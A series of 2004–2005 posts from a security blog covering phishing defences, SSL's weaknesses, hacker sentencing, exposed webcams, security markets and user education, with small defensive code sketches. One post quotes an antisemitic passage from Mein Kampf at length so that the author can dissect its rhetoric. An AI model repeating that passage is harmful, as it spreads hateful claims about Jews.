    When the user clicks on a URL that we think is a phishing URL, he now gets prompted before we open it. Handles two cases so far. Hopefully we can add more as we figure out how. The host name of the actual URL is an IP address. The link text is a URL whose host name does not match the host name of the actual URL. I added support for a silentMode so later on we can hopefully walk an existing message DOM and call into this routine on each link element in the DOM. This would allow us to insert an email scam warning bar in the message window down the road.
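    Those two cases are simple string checks. Here's a hypothetical Python rendering of them (the real fix lives in Thunderbird's own code, which isn't shown in the bug):

        import ipaddress
        from urllib.parse import urlparse

        def looks_phishy(href: str, link_text: str) -> bool:
            """The bug's two heuristics: the real target is a bare IP
            address, or the visible link text is itself a URL whose host
            differs from where the link actually goes."""
            actual_host = urlparse(href).hostname or ""
            try:
                ipaddress.ip_address(actual_host)
                return True                    # case 1: numeric host
            except ValueError:
                pass
            shown_host = urlparse(link_text).hostname
            if shown_host and shown_host != actual_host:
                return True                    # case 2: text/target mismatch
            return False

        # looks_phishy("http://10.1.2.3/login", "http://www.mybank.com") -> True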

    That's good stuff from MacGregor! It is similar to the fix that JPM reported a couple of days ago. Momentum is building to fix the tools, so we might soon start to see work in browsers - the thing actually being attacked - to address phishing. So far, Firefox has made a small start with a yellow SSL bar and the SSL domain name on the bottom right. More will follow, especially as the fixes outside the browser force phishers towards more "correct" URLs and SSL attacks.

    Posted by iang at 10:11 AM | Comments (3) | TrackBack

    January 21, 2005

    The Big Lie - does it apply to 2005's security problems?

    I've been focussed on a big project that finally came together last night, so am now able to relax a little and post. Adam picked up on this comment on hapless Salman Rushdie, still suffering from his maybe-fatwa. Which led to a link on the Big Lie, and this definition:

    "All this was inspired by the principle - which is quite true in itself - that in the big lie there is always a certain force of credibility; because the broad masses of a nation are always more easily corrupted in the deeper strata of their emotional nature than consciously or voluntarily; and thus in the primitive simplicity of their minds they more readily fall victims to the big lie than the small lie, since they themselves often tell small lies in little matters but would be ashamed to resort to large-scale falsehoods. It would never come into their heads to fabricate colossal untruths, and they would not believe that others could have the impudence to distort the truth so infamously."

    Today's pop quiz is: Who wrote that?

    I'll let slip one little hint: he was one of the great orators of the 20th century. If you are the impatient sort that can't handle a little suspense, you can click on the WikiPedia link to see, but let's analyse his theory first.

    To his big lie. The concept is breathtaking in its arrogance, but it's also difficult to deny. I'm sure you can think of a few in politics, right now, but this is an FC forum, so let's think like that. I can think of two cases where the big lie has occurred.

    The first was in the security of a payment system I worked with back in the 90s. It was totally secure, as everyone agreed. Yet it wasn't, and watching that unravel led to fascinating observations as the organisation had to face up to its deepest secrets being revealed to the world. (In this case, some bright upstart from California had patented the secrets, which should give you enough of a clue...).

    The second big lie was the secure browsing system. SSL in browsers, in other words. It was supposed to be secure, but the security started unravelling a few years back as phishing started to get going. Before that, I'd been poking at it and unwinding some of the assumptions in order to show it wasn't secure. It was a hobby, back then, as what we do in the security world is hone our skills by taking apart someone else's system.

    To little avail. And I now wonder if what I was facing was the big lie? A community of Internet security people had created the belief that it was secure. And this enabled them to ignore any particular challenge to that security. Hence if, by way of example, we pointed out that, say, a breach on any certificate authority would cause all CAs to be breached, this was easily fobbed off onto some area of the intricate web (e.g., CAs are audited, therefore...).

    Now, that area could also easily be shown to be weak as well, but by that time people had lost interest in our arguments. They had done their job, perhaps, or they simply relied on other people to assure them that those other areas were safe. My own view is that when one steps outside the discipline, all subtlety disappears and the truth becomes, well, gospel. (Auditing makes companies safe, right? That's what Sarbanes-Oxley and Basel II and all that is about!)

    Our orator from the past goes on to say:

    "Even though the facts which prove this to be so may be brought clearly to their minds, they will still doubt and waver and will continue to think that there may be some other explanation. For the grossly impudent lie always leaves traces behind it, even after it has been nailed down, a fact which is known to all expert liars in this world and to all who conspire together in the art of lying."

    Now, he conveniently pins the blame on a conspiracy of expert liars, which we'll leave for the moment. But notice how even as the lie "leaves traces behind it" the power of the mind turns to searching for the explanation that keeps it "true." And so it is with phishing and the web browser's security against a spoofed site. Even as phishing reaches institutional scale, the basic facts of the matter - it's an attack on the secure browser - are ignored.

    There must be some other explanation! If we were to say that the browser should identify the site, and it doesn't, then that would mean that secure browsing isn't secure, and that can't be right, can it? There must be some other explanation... and all of the associations and cartels and standards organisations and committees are rushing around in ever enlarging circles proposing server software, secure hardware tokens, user education, and bigger fines.

    The big lie is an extraordinarily powerful thing. In closing, I'll post the last part of that extract, which might alert you to the author. Call it clue #2. But keep an open mind as to what he is saying, because I'll challenge you on it!

    "These people know only too well how to use falsehood for the basest purposes. From time immemorial, however, the Jews have known better than any others how falsehood and calumny can be exploited. Is not their very existence founded on one great lie, namely, that they are a religious community, where as in reality they are a race? And what a race! One of the greatest thinkers that mankind has produced has branded the Jews for all time with a statement which is profoundly and exactly true. Schopenhauer called the Jew 'The Great Master of Lies.' Those who do not realize the truth of that statement, or do not wish to believe it, will never be able to lend a hand in helping Truth to prevail."

    Now, we all know that isn't true. Or do we? Just exactly how did our orator create such a fascinating big lie, and how many people do you know that can unravel the above and work out what he did?

    Here's what I think he did. Firstly, he described the big lie. Then, he attributed the big lie to his targeted victims. In that way, he hid the fact that he himself was creating another big lie set squarely against the first one.

    So our hapless citizen has to not only unravel one big lie, but two big lies. Not only that, but the first big lie has probably been around for yonks, and just has to be true, right?

    Offering a defence to Adolf Hitler's inspiration is tough. (Yes, it was he, writing in Mein Kampf, if you haven't already guessed it. WikiPedia.) Two big lies do not a big truth make? Nice, pithy, and will not be understood by our 99% target population. It takes a big lie to defeat a big lie?

    A puzzler to be sure. For now, I'll leave you with the big thought that it's time for a big coffee.

    Posted by iang at 09:45 AM | Comments (8) | TrackBack

    January 15, 2005

    T-mobile cracker also hacks Proportionality with Embarrassment

    All the blogs (1, 2, 3) are buzzing about the T-Mobile cracker. 21-year-old Nicolas Jacobsen hacked into the phone company's database and lifted identity information for some 400 customers, and also scarfed up photos taken by various phone users. He sold these and presumably made some money. He was at it for at least 6 months, and was picked up in an international sweep that netted 28 people.

    No doubt the celebrity photos were embarrassing, but what was cuter was that he also lifted documents from the Secret Service and attempted to sell them on IRC chat rooms!

    One would suppose that he would find himself in hot water. Consider the young guy who tried to steal a few credit cards from a hardware store by parking outside and using his laptop to wirelessly hack in and install a trojan. He didn't succeed in stealing anything, as they caught him beforehand. Even then, the maximum he was looking at was 6 credit card numbers. Clearly, a kid mucking around and hoping to strike lucky, this was no real criminal.

    He got 12 years. That's 2 years for every credit card he failed to steal.

    If proportionality means anything, Jacobsen is never ever going to see sunlight again. So where are we now? Well, the case is being kept secret, and the Secret Service claim they can't talk about it. This is a complete break with tradition, as normally the prosecution will organise a press circus in order to boost their ratings. It's also somewhat at odds with the press release they put out on the other 19 guys they picked up.

    The answer is probably that which "a source" offers: "the Secret Service, the source says, has offered to put the hacker to work, pleading him out to a single felony, then enlisting him to catch other computer criminals in the same manner in which he himself was caught. The source says that Jacobsen, facing the prospect of prison time, is favorably considering the offer."

    Which is fine, except the hardware shop hacker also helped the hardware store to fix up their network and still got 12 years. The way I read this message is that proportionality - the punishment matching the crime - is out the window, and if you are going to hack, make sure you hack the people who will come after you to the point of ridicule.

    Posted by iang at 02:37 PM | Comments (5) | TrackBack

    January 10, 2005

    Security by Obscurity blooper - Cameras caught on Google

    Those of you who shudder over my aggressive adoration of "security by obscurity" will cheer the article in the Register that reveals the latest on-camera bloopers.

    It seems that thousands of webcams (little cameras for PCs) install and open up webservers by default. Now, this is a fine thing to do if you can keep your webserver "hidden" from view. (That's what we mean by security by obscurity!) But recall that google and/or others have been shipping spyware tools that capture secret URLs from chat sessions and email sessions, and then forward them to search engines! Well, it was only a matter of time before someone figured out a way to search google for all those secret cameras ...

    Suddenly, the age-old trick of using a secret webserver or URL to distribute a private document no longer works. Whoops. Security by obscurity just flipped that trick on its head.

    But, let's not throw out the baby with the bathwater. Anyone using that trick should have known that they were taking a risk. Now we know the risk is dramatically enhanced by spyware snaffling secret URLs. So, stop doing it. But, while it lasted, it was a good trick, and it saved lots of people lots of costs.
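    As an aside, the trick itself is easy enough to sketch. Below is a minimal illustration - my own toy code, not anything any vendor shipped, with example.com and the path made up - of minting an unguessable "secret URL" from /dev/urandom on a POSIX system. Note what it shows: the token's 128 bits of entropy defend only against guessing. Once spyware forwards the whole URL to a search engine, the obscurity is gone, no matter how random the token was.

        /* Toy sketch: mint an unguessable URL path from /dev/urandom.
         * The entropy defeats guessing; it does nothing against spyware
         * that forwards the finished URL to a search engine. */
        #include <stdio.h>

        int main(void)
        {
            unsigned char token[16];    /* 128 bits of randomness */
            FILE *rnd = fopen("/dev/urandom", "rb");

            if (rnd == NULL || fread(token, 1, sizeof token, rnd) != sizeof token) {
                perror("/dev/urandom");
                return 1;
            }
            fclose(rnd);

            printf("http://example.com/private/");      /* hypothetical host */
            for (size_t i = 0; i < sizeof token; i++)
                printf("%02x", token[i]);               /* hex-encode the token */
            printf("/report.pdf\n");
            return 0;
        }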

    Oh, for the victims - those companies shipping the webserver camera setups that are insecure by default - well, you deserve to be embarrassed. And the people spied upon by the bloggers ... consider the greater good of teaching us how to secure our world as your compensation. And let's hope you weren't doing anything too embarrassing.

    Posted by iang at 09:37 AM | Comments (4) | TrackBack

    January 04, 2005

    Accountants list the tech problems, Security and Sarbanes-Oxley take pole positions

    A tech survey by accountants gives some interesting tips on security. The reason it is credible is because the authors aren't from our industry, so they can be expected to approach this without the normal baggage of some security product to sell. Of course their own is for sale, but that's easy to factor out in this case.

    Security is still the Number One concern that accountants are seeing out there. That makes sense. It accords with everything we've seen about the phishing and identity theft explosions over the last couple of years.

    Second is electronic document management. Why now? This issue has been around for yonks, and businesses have been basically doing the paperless office as and when they could. My guess is that things like Sarbanes-Oxley, Basel II and various lesser-known regulatory attacks on governance have pushed this to the fore. Now, if you haven't got your documents under control (whatever that means) you have a big risk on your hands.

    Third is Data Integration. This echoes what I've seen in finance circles of late; they have gone through a phase of automating everything with every system under the sun. Now, they're faced with tying it all together. The companies selling product at the moment are those with tools to ease that tying together. But so far, buyers are not exactly enticed, with many dreading yet another cycle based on the current web services hype.

    Spam has slipped to Fourth in the rankings of the "biggest concerns". The article tries to hint at this as a general easing of the problem, but I'd suggest caution: there are far too many ways in which this can be misinterpreted. For example, the huge increase in security concerns over the last year has probably simply overshadowed spam, to the extent that spam may well have doubled and we'd not have cared. Identity Theft is now on the agenda, and that puts the spam into context. One's a nuisance and the other's a theft. Internet security experts may be bemused, but users and accountants can tell the difference.

    For the rest, read on...


    Information Security Once Again Tops AICPA Tech List

    Jan. 3, 2005 (SmartPros) For the third consecutive year, information
    security is the country's number one technology concern, according to the
    results of the 2005 Top Technologies survey of the American Institute of
    Certified Public Accountants.

    The survey, conducted annually since 1990, seeks to determine the 10 most
    important technology issues for the coming year. There were more than 300
    participants in the 2005 survey, a 30 percent increase over the previous
    year.

    Interestingly, spam technology -- an issue closely associated with
    information security -- apparently has lost some currency. It made its debut
    on the 2004 list at number two. On the new list, it falls to number four.

    "Because our work and personal lives are now inextricably linked to
    information systems, security will always be top of mind," said Roman
    Kepczyk, CPA/CITP, Chair of the AICPA's Information Technology Executive
    Committee. Commenting on spam technology's lower placement on the list, he
    said, "We've seen major improvements to filtering systems, which have
    allowed us to bring spam under greater control. This most likely is the
    reason that spam technology doesn't command the importance it did in the
    previous survey."

    A different issue closely allied with information security -- electronic
    data management, or the paperless office -- moved up to second place. It was
    number three last year.

    There are two debuts on the Top Technologies list: authentication
    technologies and storage technologies. Another issue, learning and training
    competency, reappears at number 10 after an absence of three years.

    The following are the 2005 Top 10 Technologies:

    1.. Information Security: The hardware, software, processes and procedures
    in place to protect an organization's information systems from internal and
    external threats.

    2.. Electronic Document Management (paperless or less-paper office): The
    process of capturing, indexing, storing, retrieving, searching and managing
    documents electronically. Formats include PDF, digital and image store
    database technologies.

    3.. Data Integration: The ability to update one field and have it
    automatically synchronize between multiple databases, such as the
    automatic/seamless transfer of client information between all systems. In
    this instance, only the data flows across systems from platform to platform
    or application to application. Data integration also involves the
    application-neutral exchange of information. For example, the increased use
    of XBRL (eXtensible Business Reporting Language) by companies worldwide
    provides for the seamless exchange and aggregation of financial data to meet
    the needs of different user groups using different applications to read,
    present and analyze data.

    4.. Spam Technology: The use of technology to reduce or eliminate unwanted
    e-mail commonly known as Spam.

    5.. Disaster Recovery: The development, monitoring and updating of the
    process by which organizations plan for continuity of their business in the
    event of a loss of business information resources through theft,
    virus/malware infestation, weather damage, accidents or other malicious
    destruction. Disaster recovery includes business continuation, contingency
    planning and disk recovery technologies and processes.

    6.. Collaboration and Messaging Applications: Applications that allow
    users to communicate electronically, including e-mail, voicemail, universal
    messaging, instant messaging, e-mailed voice messages and digital faxing.
    Examples include a computer conference using the keyboard (a keyboard chat)
    over the Internet between two or more people.

    7.. Wireless Technologies: The transfer of voice or data from one machine
    to another via the airwaves and without physical connectivity. Examples
    include cellular, satellite, infrared, Bluetooth, WiFi, 3G, 2-way paging,
    CDMA, Wireless/WiMax and others.

    8.. Authentication Technologies (new): The hardware, software, processes
    and procedures to protect a person's privacy and identity from internal and
    external threats, including digital identity, privacy and biometric
    authentication.

    9.. Storage Technologies (new): Storage area networks (SAN) include mass
    storage, CD-recordable, DVD, data compression, near field recording,
    electronic document storage and network attached storage (NAS), as well as
    small personal storage devices like USB drives.

    10.. Learning and Training Competency (End Users): The methodology and
    curriculum by which personnel learn to understand and use technology. This
    includes measuring competency, learning plans to increase the knowledge of
    individuals, and hiring and retaining qualified personnel with career
    opportunities that retain the stars.

    Also, each year the AICPA Top Technologies Task Force prepares a "watch
    list" of five emerging technologies [...]

    http://accounting.smartpros.com/x46436.xml

    Posted by iang at 06:59 AM | Comments (1) | TrackBack

    January 03, 2005

    Frank Abagnale at CSI - Know me if you can

    Axel's blog points to a storm in a teacup over at a professional association called the Computer Security Institute. It seems that they invited Frank Abagnale to keynote at their conference. Abagnale, if you recall, is the infamous fraudster portrayed in the movie Catch me if you can.

    [image: csi31st_abagnale_sign16.jpg]

    Many of the other speakers kicked up a fuss. It seems they had ethical qualms about speaking at a conference where the 'enemy' was also presenting. Much debate ensued, alleges Axel, about forgiveness, holier-than-thou attitudes and cashing in on notoriety.

    I have a different perspective, based on Sun Tzu's famous aphorism (often misattributed to Clausewitz). He said something to the extent of "Know yourself and you will win half your battles. Know your enemy and you will win 99 battles out of a hundred." Those speakers who complained or withdrew have cast themselves as limited to the first group, the self-knowers, and revealed themselves as reliable only to win every second battle.

    Still, even practitioners of narrow horizons should not be above learning from those who see further. So why is there such paranoia in the security industry about dealing only with the honest side? This is the never-ending white-hat versus black-hat debate. I think the answer can be found in guildthink.

    People who are truly great at what they do can afford to be magnanimous about the achievements of others, even those they fight. But most are not like that; they are continually trapped in a sort of middle-level, process-oriented tier, implementing that which the truly great have invented. As such, they are always on the defensive against attacks on their capabilities, because they are unable to deal at the level where they can cope with change and revolution.

    This leads the professional tiers to always be on the lookout for ways to create "us" and "them." Creating a professional association is one way, or a guild, to use the historical term.

    [image: csi31st_abagnale_norris.jpg]

    Someone like Frank Abagnale - a truly gifted fraudster - has the ability to make them look like fools. Thus, he scares them. The natural response to this is to search out rational and defensible ways to keep him and his ilk on the outside, in order to protect the delicate balance of trade. For that reason, it is convenient to pretend to be morally and ethically opposed to dealing with those that are convicted. What they are really saying is that his ability to show up the members for what they are - middle ranking professionals - is against their economic interests.

    In essence, all professionals do this, and it should come as no surprise. All associations of professionals spend a lot of their time enhancing the credibility of their members and the dangers of doing business with those outside the association. So much so that you won't find any association - medical, accounting, engineering, or security - that will admit that this is all normal competitive behaviour. (A quick check of the CSI site confirms that they sell training, and they had a cyberterrorism panel. Say no more...)

    So more kudos to the CSI for breaking out of the mold of us and them! It seems that common sense won over and Frank attended. He can be seen here in a photo op, confirming his ability to charm the ladies, and giving "us" yet another excuse to exclude him from our limited opportunities with "them"!


    Posted by iang at 08:59 AM | Comments (0) | TrackBack

    January 02, 2005

    Security Signalling - the market for Lemmings

    Adam continues to grind away at his problem: how to signal good security. It's a good question, as we know that the market for security is highly inefficient, some would say dysfunctional. E.g., we perceive that many security products are good but ignored, while others are bad but extraordinarily popular, and that despite repeated evidence of breaches, users flock to the bad ones en masse with lemming-like behaviour.

    I think a real part of this is that the underlying question of just what security really is remains unstudied. So, what is security? Or, in more formal economics terms, what is the product that is sold in the market for security?

    This is not such an easy question from an economist's point of view. It's a bit like the market for lemons, which was thought to be just anomalous and weird until some bright economist sat down and studied it. AFAIK, nobody's studied the market for security, although I admit to only having asked one economist, and his answer was "there's no definition for *that* product that I know of!"

    Let's give it a go. Here's the basic issue: security as a product lacks good testability. That is, when you purchase your standard security product, there is no easy way to show that it achieves its core goal, which is to secure you against the threat.

    Well, actually, that's not quite correct; there are obviously two sorts of security products, those that are testable and those that are not. Consider a gate that is meant to guard against dogs. You can install this in a fence, then watch the rabid canines try and beat against the gate. With a certain amount of confidence you can determine that the gate is secure against dogs.

    But, now consider a burglar alarm. You can also install it with about the same degree of effort. You can conduct the basic workability tests, same as a gate. One opens and goes click on closing; the other sets and resets, with beeping.

    But there the comparison gets into trouble, as once you've shown the burglar alarm to work, you still have no real way of determining that it achieves its goal. How do you know it stops burglars?

    The threat that is being addressed cannot be easily simulated. Yes, you can pretend to be a burglar, but non-burglars are pretty poor at that. Whereas one doesn't need to be a dog to pretend to be a dog, and do so well enough to test a gate.

    What then is one supposed to do? Hire a burglar? Well, let's try that: put an ad in the paper, or more digitally, hang around IRC and learn some NuWordz. And your test burglar gets in and ... does what? If he's a real burglar, he might tell you or he might just take the stuff. Or, both, it's not unreasonable to imagine a real burglar telling you *and* coming back a month later...

    Or he fails to get in. What does that tell you? Only that *that* burglar can't get in! Or that he's lying.

    Let's summarise. We have these characteristics in the market for security:

    1. The core claim - that the product secures you against a threat - cannot be tested directly.
    2. Simulated threats are poor substitutes for the real thing: non-burglars make poor burglars.
    3. Real threats can't reliably be hired, and whatever result they deliver - entry, failure or silence - tells you little either way.

    Perhaps some examples might help. Consider a security product such as Microsoft's Windows operating system. Clearly they write it as well as they can, and then test it as much as they can afford. Yet, it always ships with bugs in it, and in time those bugs are exploited. So their testing - their simulated threats - is unsatisfactory. And their ability to arrange testing by real threats is limited by the inefficient market for blackhats (another topic in itself, but one beyond today's scope).

    Closer to (my) home, let's look at crypto protocols as a security product. We can see that they fit the same pattern: the simulated threat is the review by analysts, the open source cryptologists and cryptoplumbers who pore through the code and specs looking for weaknesses. Yet, it's expensive to purchase review of crypto, which is why so many people go open source and hope that someone finds it interesting enough. And, even when you can attract someone to review your code, it is never a complete review. It's just what they had time for; no amount of money buys a complete review of everything that is possible.

    And, if we were to have any luck in finding a real attacker, then it would only be by deploying the protocol in vast numbers of implementations or in a few implementations of such value that it would be worth his time to try and attack it. So, after crossing that barrier, we are probably rather ill-suited to watching for his arrival as a threat, simply due to the time and effort already undertaken to get that far. (E.g., the protocol designers are long since transferred to other duties.) And almost by default, the energy spent in cracking our protocol is an investment that can only be recouped by aggressive acquisition of assets on the breach.

    (Protocol design has always been known to have highly asymmetric characteristics in security. It is for this reason that the last few years have shown a big interest in provability of security statements. But this is a relatively young art; if it is anything like the provability of coding that I did at University it can be summarised as "showing great potential" for many decades to come.)

    Having established these characteristics, a whole bunch of questions are raised. What then can we predict about the market for Lemmings? (Or is it the market for Pied Pipers?) If we cannot determine its efficacy as a product, why is it that we continue to buy? What is it that we can do to make this market respond more ... responsibly? And finally, we might actually get a chance to address Adam's original question, to wit: how do we go about signalling security, anyway?

    Lucky we have a year ahead of us to muse on these issues.

    Posted by iang at 12:24 AM | Comments (7) | TrackBack

    December 30, 2004

    Netcraft breaks ranks and points the crooked black claw of doom at the SSL security model

    In a show of remarkable adeptness, Netcraft have released an anti-phishing plugin for IE. Firefox is coming, so they say. This was exciting enough to make it on Slashdot, as David at Mozilla pointed out to me.

    There are now dozens of plugins floating around designed to address phishing. (If that doesn't say this is a browser issue, I don't know what will. Yes, the phish are growing wings and trialling cell phones, pagers and any other thing they can get at, but the main casting action is still a browser game.) The trustbar one is my favourite, although it doesn't work on my Firefox.

    So, what about Netcraft? Well, it's quite inspired. Netcraft have this big database of all the webservers in existence, and quite a few that are not. The plugin simply pops on over to the Netcraft database and asks for the vital stats on that website.

    Well, hey ho! Why didn't we think of that?

    There's a very good reason why not. Several, in fact. Firstly, this puts Netcraft into your browser in an important position; if they succeed at this, then they have an entrée into users' hearts and minds. That means some sort of advertising revenue model, etc etc, as clearly permitted in their licence. Or worse, their own little spyware programs, which may or may not be permitted under their Privacy clause.

    (So one reason we didn't think of that is because we all hate advertising models ... just so we're clear on that point!)

    But more interesting is that Netcraft is a player in the security industry. At least, they are a collector of CA and SSL statistics, and their reports sell for mighty big bucks. So one might expect them to pay attention to those suggestions that supported the SSL industry, like the ones that I frequently ... propose.

    But, no. What they have done is completely bypass the SSL security model and craft a new one based on a database of known information. If one has followed the CA security debate, it bears a stunning similarity to the notions of what we'd do if we were attempting to fix the model. It's the endgame: to fix the revocation problem you add online checking, which means you don't need the CAs any more.

    Boom. If Netcraft succeeds in this approach (and there is no reason why others can't copy it!) then we don't need CAs any more. Well, that's not quite true, what this implies is that Netcraft just became a CA. But, they are a CA according to their rules, not those historical artifacts popularised by accounting entities such as WebTrust.

    So it's another way to become a CA: give away the service for free, acquire the user base, and figure out how to charge for it later. A classic dotcom boom strategy, right? Bypass the browser policy completely because it is struggling under the weight of the WebTrust legacy, and the security wood can't be seen for the policy trees.

    (Now, some will be scratching their heads about the apparent lack of a cert in the plugin. Don't worry, that's an implementation detail. They can add that later, for now they offer a free certificate service with no cert. Think of the upgrade potential here. The important thing is to see if this works as a *business* model first.)

    So this takes aim at the very group that they sell reports to. Of course, the people who want to buy reports on certificate use are the CAs, and their various suppliers of CA toolkits.

    That's why it's a significant event. (And another reason why we didn't think of it!)

    Netcraft have obviously worked out several things: the CAs are powerless to do anything about phishing, and that's a much bigger revenue stream than a few boring reports. Further, the security model is stagnant at best and a crock at worst, so why not try something new? And, the browser manufacturers aren't playing their part, with nary a one admitting that the problem is in their patch. So their users are also vulnerable to a takeover by someone with some marketing and security sense.

    Well done Netcraft, is all I can say! Which is to say that I have no idea whether the plugin itself will work as advertised. But the concept, now, that's grand!

    Posted by iang at 02:26 PM | Comments (2) | TrackBack

    December 29, 2004

    Simple Tips on Computer Security

    Recently, it's become fashionable to write an article on how to protect yourself from all the malware, phishing, spyware, viruses, spam, espionage and bad disk drives out there. Here are some: [IBM], [Schneier], [GetLuky].

    Unfortunately, most of them go over the heads of ordinary users, and many of them challenge even experienced users! So I've been keeping my eye out for succinct tips, the sort for car owners who don't know what an oil change is. I have two which I've posted here before, being Buy a Mac and download FireFox. Both good things, but I feel the lack of any good tip for phishing; there just isn't a good way to deal with that yet.

    There they are, sitting in a box on the right of the blog.

    1. Buy a Mac - Uses BSD as its secure operating system...
    2. Download FireFox - Re-engineered for security...
    3. Check name of site - written on bottom right of FireFox, next to padlock...
    4. Write Passwords Down - In a safe place...

    People do ask me from time to time what to do. I feel mightily embarrassed because I have no Windows machine, but I also find myself empathising with ordinary users who ask what it means to upgrade the software! So my tips are designed for people who know not what SP2 means.

    Let me know your suggestions, but be warned: they'd better be very very simple. Coz that's all that counts for the user.

    Posted by iang at 05:47 PM | Comments (15) | TrackBack

    December 27, 2004

    User education: worse than useless

    Cypherpunk asks a) why has phishing gone beyond "don't click that link" and b) why can't we educate the users?

    A lot of what I wrote in The Year of the Snail is apropos to that first question. In economic terms, we would say that Phishing is now institutionalised. In more general parlance, and in criminal terms, it would be better expressed as organised crime. Phishing is now a factory approach, if you like, with lots of different phases, and different actors all working together. Which is to say that it is now very serious - not a simple net bug like viruses or spam - and that generally means telling people to avoid it will be inadequate.

    We can look at the second question much more scientifically. The notion of teaching people not to click has been tried for so long now that we have a lot of experience just how effective the approach of 'user education' is. For example, see the research by Ye and Smith and also Herzberg and Gbara, who tested users in user interface security questions. Bottom line: education is worse than useless.

    Users defy every effort to be educated. They use common sense and their own eyes: and they click a link that has been sent to them. If they didn't do that, then we wouldn't have all these darn viruses and all this phishing! But viruses spread, and users get phished, so we know that they don't follow any instructions that we might give them.

    So why does this silly notion of user education persist? Why is every security expert out there recommending that 'users be educated' with not the least blush of embarrassment at the inadequacy of their words?

    I think it's a case of complexity, feedback and some fairly normal cognitive dissonance. It tends to work like this: a security expert obviously receives his training from some place, which we'll call received wisdom. Let's call him Trent, because he is trusted. He then goes out and employs this wisdom on users. Our user, Alice, hears the words of "don't click that link" and because of the presence of Trent, our trusted teacher, she decides to follow this advice.

    Then, Alice goes out into the world and ... well, does productive work, something us Internet geeks know very little about. In her office every day she dutifully does not click, until she notices two things. Firstly, everyone else is clicking away like mad, and indeed sending lots of Word documents and photos of kids and those corny jokes that swill around the office environment.

    And, secondly, she notices that nobody else seems to suffer. So she starts clicking and enjoying the life that Microsoft taught her: this stuff is good, click here to see my special message. It all becomes a blur and some time later she has totally forgotten *why* she shouldn't click, and cannot work out what the problem is anyway.

    (Then of course a virus sweeps the whole office into the seas ...)

    So what's going on here? Well, several factors.

    1. Trent successfully educated Alice. So he runs around with the notion that user education is a fine tool and it works A-OK! Yes, he believes that we can achieve results this way. He promotes user education as the answer to our security needs.
    2. Alice more or less left her education session successfully educated. But it doesn't last, because everyone else doesn't do it, and she can't see the sense in it anyway. That is to say, in systems theory, Alice cannot close the loop. She cannot see the action she is asked for as causing any additional security. As there is no reinforcing feedback, after a while it breaks, and never gets renewed.
    3. Trent only managed to impress a small group of users. The vast majority of users out there however are 'the masses'. Many people don't actually know any computer experts, and they go into a retail store like Walmart to buy their computer. They have enough trouble coping with the fact that the parts need to be connected together in order to work ... and esoteric notions of clicks and security and viruses just go right over their heads.
    4. When a virus or other plague like phishing does sweep through and wash the users into the sea, it's very unclear whom to blame. Was it the bank? Was it Microsoft? Was it Sally-Anne who clicked on too many links? Or Simon the systems administrator who installed a new virus filter? Or, maybe it was Hamisch the terrible eastern European hacker again? Or ... , or ..... Just exactly why it happens is nearly impossible to determine, and *that* means that the distance between the crime and any adequate defences is so great that there is no real feedback to reinforce the defences. Why defend when it is not doing anything?
    5. If only a small subset of users are 'educated' this achieves nothing other than the minor effect of them potentially being protected. That's because if a virus sweeps through, we all suffer, even if we have protected ourselves. Yet, to stop the virus, we *all* have to follow the discipline. So we have a sort of free-rider problem: we have no way to make sure that all the users are 'educated' and thus there is no real incentive for anyone to educate.
    6. Getting back to Trent, of course, he is secure. Everyone reading this blog is secure. Unless they are real users, in which case they didn't understand a word of it and didn't get this far (sorry about that!). So for Trent and our sort of person, we don't see the problem because it doesn't directly affect us. We are shut off from the real world of users.

    Hence, cognitive dissonance. In this case, the security industry has an unfounded view that education is a critical component of a security system. Out in the real world, though, that doesn't happen. Not only doesn't the education happen, but when it does happen, it isn't effective.

    Perhaps a better way to look at this is to use Microsoft as a barometer. What they do is generally what the user asks for. The user wants to click on mail coming in, so that's what Microsoft gives them, regardless of the wider consequences.

    And, the user does not want to be educated, so eventually, Microsoft took away that awful bloody paperclip. Which leaves us with the lesson of inbuilt, intuitive, as-delivered security. If you want a system to be secure, you have to build it so that it is intuitively so to the user. Each obvious action should be secure. And you have to deliver it so that it operates out of the box, securely. (Mozilla have recently made some important steps in this direction by establishing a policy of delivery to the average user. It's a first welcome step which will eventually lead them to delivering a secure browser.)

    If these steps aren't taken, then it doesn't help to say to the user, don't click there. Which brings me to the last point: why is user education *worse* than useless? Well, every time a so-called security expert calls for the users to be educated, he is avoiding the real problems, and he is shifting the blame away from the software to the users. In this sense, he is the problem, and until we can get him out of the way, we can't start thinking of the solutions.

    Posted by iang at 02:17 PM | Comments (4) | TrackBack

    December 19, 2004

    Security Coding Best Practices - Java adds yet another little check, and boom...

    Over on Adam's blog he has a developing theme on 'security signalling.' He asks whether a code-checking program like RATS would signal to the world that a product is a good secure product? It's an important question, and if you need a reason, consider this: when/if Microsoft gets done rewriting its current poisoned chalice of an operating system, how is it going to tell the world that it's done the job?

    Last night I had occasion to feel the wrath of such a check, so can now respond with at least one sample point. The story starts earlier in the week, when I reinstalled my laptop with FreeBSD 5.3. This was quite a massive change for me, up from 4.9 which had slowly been dying under the imposition of too many forward-compatible ports. It also of course retriggered a reinstall of languages, but this should have been no trouble as I already had jdk1.4.2 installed, and that was still the current. (Well, I say no trouble ... as Java is "unsupported" on FreeBSD, mostly because of Sun's control freak policies creating a "write once, run twice" environment.)

    Anyway, my code went crazy (*). A minor change in the compiler checking brought out a squillion errors. Four hours later, and I'd edited about 100 files and changed about 500 lines of code. My eyes were glazed, my brain frizzled and the only cognitive capability I had left was to open beers and dispose of them.

    Now, this morning, I can look at the effect, hopefully in the cold hard light of a northern winter's sunny day. At least for another hour.

    It's security code (hard crypto payments) so am I more secure? No. Probably actually less secure, because the changes were so many and so trivial that the robot masquerading as me made them without thinking; just trying to get the darn thing to compile so I could get back to my life.

    So one answer to whether the RATS proposal could make any difference is that it could make things worse: If thrown at a project, the rush to get the RATS thing to come out clean could cause more harm than good.

    Which is a once-off effect or a singularity. But what if you didn't have a singularity, and you instead just had "good coding checks" all the time?

    Well. This is just like the old days of C, where some shops used Lint and others didn't. (Lint was an old tool for cleaning out "fluff" from your C code.) Unfortunately there wasn't enough of a real discernible difference that I ever saw to be able to conclude that a Lint-using shop was more secure.

    What one could tell is that the Lint-using shop had some coding practices in place. Were they good practices? Sometimes, yes. Maybe. On the whole Lint did good stuff, but it also did some stupid things, and the net result was that either you used Lint or you were careful, and not using Lint was either a signal that you were careful and knew more, or you weren't careful, and knew less; whereas using Lint was a signal that you didn't know enough to be careful, but at least you knew that!

    We could debate for years on which is better.

